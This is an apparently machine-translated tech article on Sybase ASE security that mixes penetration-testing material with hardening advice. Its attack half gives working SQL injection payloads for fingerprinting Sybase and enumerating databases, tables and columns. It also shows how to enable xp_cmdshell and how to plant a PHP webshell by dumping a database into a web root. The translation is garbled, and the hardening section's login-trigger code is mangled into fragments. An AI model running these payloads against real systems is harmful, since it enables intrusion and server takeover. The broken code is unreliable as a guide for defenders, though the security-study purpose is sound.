Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

Example Analysis of Sybase Database Security

2025-01-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Database >

Share

Shulou(Shulou.com)05/31 Report--

What this article shares with you is an example analysis of Sybase database security. The editor thinks it is very practical, so I share it with you to learn. I hope you can get something after reading this article.

Introduction to 0x00 Sybase database

Brief introduction

The full name of Sybase is also called SAP Sybase Adaptive Server Enterprise (ASE or Sybase ASE for short), which inherits from the original code of MSSQL and is closely related to MSSQL. Sybase is a kind of relational database system, which is a typical large database system in client / server environment on UNIX or WindowsNT platform. It uses PowerBuilder as the development tool and SAP Sybase SQL Anywhere as the client. At present, the new version is ASE 15.7.x, named directly from 12.5.5 to 15.0.0 (skip the middle 13 and 14). This test is 12.5.2, of which 12.5 is the most stable version of the 12 major versions.

When creating a database, you should pay attention to storing devices:

Services and Ports

Open Port:

Backup service: 5001, monitoring service: 5002, database master service: 5000, stored procedure service: 5004

Default database

Master: the core database of the system, which controls the operation of the server and stores information about all user databases and related storage devices, including user names and passwords

Model: template database. When creating a user database, the system makes a copy according to the model database and expands the size of the database to the size specified by the user.

Systemprocs: saves the stored procedure for the system.

Sybsystemdb: about distributed transaction management capabilities.

Tempdb: contains temporary tables that place temporary data.

Registered users and database users

When SQL SERVER creates a registered user, the user can legally enter SQL SERVER, and the registered user information is placed in the syslogins table in the master database. However, only when a registered user becomes a database user and certain permissions are granted to that user, the registered user can use the tables in the database under restricted conditions.

Create a registered user:

Sp_addlogin loginame, passwd (drop is deleted)

Create a database user:

[dbname..] Sp_adduser loginame (the loginame here must be a registered user, otherwise an error will be reported)

Assign permissions:

Grant all | select,insert,delete,update on table_name | view_name | stored_procedure_name to username

Or

Grant all | create database,create default,create procedure,create rule,create table,create view,set proxy,set session authorization to username

Database user classification

Sa users, database owners, database object owners and database ordinary users

1), sa user: a system user with full permissions.

2), database master user: database owner (dbo) user can operate on all objects (such as tables, views, stored procedures, etc.) in this database.

3), database object owner: in actual management, it is generally the database owner.

4), database ordinary users: similar to public, database ordinary users must give certain permissions to some objects in the database (such as tables, views, processes, etc.) before they can operate on some objects in this database.

Aliases (aliases) and groups (group)

1), alias: the so-called alias (aliases) means that the registered user in SQL SERVER accesses the database as the same database user and has the same permissions as that user.

2) group is a collection of database users, that is, through the control of the permissions of the group (group), the database users in the group can be controlled, but some database users in the group can also be specially controlled.

Role

Generally, in the database system with detailed management division, sa users are often divided into three roles: system administrator role (SA role), system security officer role (SSO role), and operator role (OPER role).

Connectivity and management tools

1), isql

Similar to the mysql.exe of the mysql database. Can connect to local and network databases. Use isql-U sa-P "" to connect:

All parameters should be case sensitive:

-? Displays a syntax summary of the isql switch.

-L lists the names of servers configured locally and servers broadcast on the network.

-U login_id user logs in to ID. Login ID is case sensitive.

-P password is the password specified by the user. If the-P option is not used, isql prompts for a password. If you use the-P option at the end of the command prompt without a password, isql uses the default password NULL). Passwords are case sensitive.

-S server_name specifies the default instance of SQL Server to connect to. If no server is specified, isql connects to the default instance of SQL Server on the local computer. This option is required if you want to perform isql from a remote computer on the network.

-H hostname is the hostname of the client used.

-d use database name, used to specify the use of the database name

2), official Sybase SQL Advantage

Disadvantages: a, released with the complete installation package of the database, there are version requirements when using it.

B, only support SQL statements, I think it is a graphical version of isql, there is some inconvenience.

(Sql.ini settings and functions: http://blog.csdn.net/potato015/article/details/2450989)

3), official Sybase Central

Disadvantages: a, released with the complete installation package of the database, there are version requirements when using it.

B, the function is not very powerful

4), DBArtisan

0x01 Sybase security

Execute system command

Xp_cmdshell is not enabled by default. When xp_cmdshell is not enabled:

Open xp_cmdshell: sp_configure 'xp_cmdshell context',0

Execute the command after opening xp_cmdshell:

Execute xp_cmdshell when insufficient permissions:

Details:

1. Executing sp_configure 'xp_cmdshell',0 allows all login users with sa_role roles to execute xp_cmdshell commands. This function is turned off by default.

2. The default sp_configure 'xp_cmdshell',1 is tested to have the same longin user name and password under windows, and the user belongs to the administrators permission group, and one thing can not be ignored: deselect "the user needs to change the password the next time he logs in"!

3. Due to the integration with windows, MSSQL can log in to the database directly using the system account. On the other hand, Sybase needs to be configured according to the second step above to achieve a similar effect as MSSQL.

Comment character and federated query

Union is supported, annotated with / /,--, spaces can be replaced with / /, spaces can be replaced with +, and count () is supported, but wildcards cannot appear in subqueries.

12.5.2 and previous versions do not support the TOP keyword, such as the select top N from injection statement will report an error

Of course, you can't use top. There must be an alternative, and that is set rowcount N.

But set rowcount N does not seem to support subqueries and conditionals:

Multi-sentence execution

Unlike mssql, multiple statements are directly separated by spaces rather than semicolons.

Support for coding

Same as MSSQL:

SQL injection characteristics

Use Php as the script:

Use Java as the script:

Determine if it is a Sybase database:

Id=1 and exists (select * from master.dbo.ijdbc_function_escapes)

Note that sybase does not support direct comparison of different types of data (unlike MSSQL) when injecting errors:

Id=1 and 1=user id=1 and 1=convert (integer,user)! [enter image description here] [28] id=1 and 1=convert (integer, (select+@@version))! [enter image description here] [29] id=-1 union select 1, ", (select @ @ version)

Column Library (complex version):

Id=1 and 1=convert (integer, (SELECT MIN (ISNULL (CONVERT (NVARCHAR (4000), gJyQ.name), CHAR (32)) FROM (SELECT name FROM master..sysdatabases) AS gJyQ WHERE CONVERT (NVARCHAR (4000), gJyQ.name) >'))

List * libraries master

Id=1 and 1=convert (integer, (SELECT MIN (ISNULL (CONVERT (NVARCHAR (4000), gJyQ.name), CHAR (32)) FROM (SELECT name FROM master..sysdatabases) AS gJyQ WHERE CONVERT (NVARCHAR (4000), gJyQ.name) > 'master'))

List * libraries except master

Column Library (simple version):

Id=1 and 1=convert (integer, (SELECT name FROM master..sysdatabases where dbid=1)) continues to increase the value of dbid

Dbid is a continuous number, which is easy to guess.

PS: although Sybase cannot use TOP or for xml path, it supports having, where not in and other grammars, and there are still many ways to change.

One thing is different from MSSQL:

MSSQL is xtype Sybase. It's type.

List (complex version only):

Id=1 and 1=convert (integer, (select MIN (ISNULL (CONVERT (NVARCHAR (4000), aaaa.name), CHAR (32)) from (select name from test.dbo.sysobjects where type='U') AS aaaa where CONVERT (NVARCHAR (4000), aaaa.name) >'))

List * * tables cmd

Id=1 and 1=convert (integer, (select MIN (ISNULL (CONVERT (NVARCHAR (4000), aaaa.name), CHAR (32)) from (select name from test.dbo.sysobjects where type='U') AS aaaa where CONVERT (NVARCHAR (4000), aaaa.name) > 'cmd'))

List * tables except cmd cmd0

Column fields:

Select name from test..syscolumns where id=object_id ('users') and colid=1 incremental colid

That is:

Id=1 and 1=convert (integer, (select name from test..syscolumns where id=object_id ('users') and colid=1))

Tool injection:

Pangolin can not guess the library name, grab the package found to use the TOP keyword, it seems that pangolin only supports sybase after 12.5.3

Backup write file (webshell)

Prerequisites:

1. Backup service is enabled.

2. Backup service allows remote access

3. Database permissions (host permissions) + disk write permissions

Steps:

, create table cmd (an image)-

, insert into cmd (a) values ('')-

, dump database test to'C:\ wamp\ www\ 1.php' [full backup]

(the corresponding MSSQL is: backup database library name to disk= 'C:\ wamp\ www\ 1.php 'WITH DIFFERENTIAL,FORMAT;--)

Dump TRANSACTION test to'C:\ wamp\ www\ 1.php' [LOG backup]

(the corresponding MSSQL is: backup log library name to disk='d:\ www\ xxx\ test.asp'--)

Note: when using dump TRANSACTION, it is required that data files and log files cannot be stored in the same device.

、 drop table cmd--

Reinforcement and prevention

Password

Sp_password "original password", "New password", user name

For example, change the password of a sa user from empty to 123456: sp_password NULL, "123456", sa

Sp_configure "minimum password length", 8-minimum password length sp_configure "check password for digit", 1-contains at least one number sp_configure "systemwide password expiration", 90-password valid duration sp_configure "maximum failed logins", 5-sets password error locking threshold

Delete the extended stored procedure xp_cmdshell and delete sybsyesp.dll

Exec sp_dropextendedproc xp_cmdshell

Close the use of the sa account:

Sp_locklogin sa, "lock"

Turn off remote access:

Exec sp_configure "allow remote access", 0

Exec sp_configure "allow remote access", 0

After shutdown, many services will be unavailable, such as backup

Log in to IP whitelist

The system has no restrictions related to login, so we can only create login triggers to achieve login IP whitelist.

Create procedure login_trg as declare @ ip varchar (18), @ login_name varchar (20) begin select @ ip=t.ipaddr,@login_name=suser_name () from master.dbo.sysprocesses t where t.spid=@@spid if @ ip'192.168.0.102' begin raiserror 30000'IP address 1!, with user 2! Login failed recording, logging, naming, select syb_quit (), end else print, Welcomeering. End

After creating a login trigger, execute the following command:

Isql > grant execute on login_trg to loginname isql > sp_modifylogin loginname, "login script", login_trg

Journal

Isql > exec sp_configure "log audit logon failure", 1-record login failure information isql > exec sp_configure "log audit logon success", 1-record login success information above is the example analysis of Sybase database security, Xiaobian believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Database

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report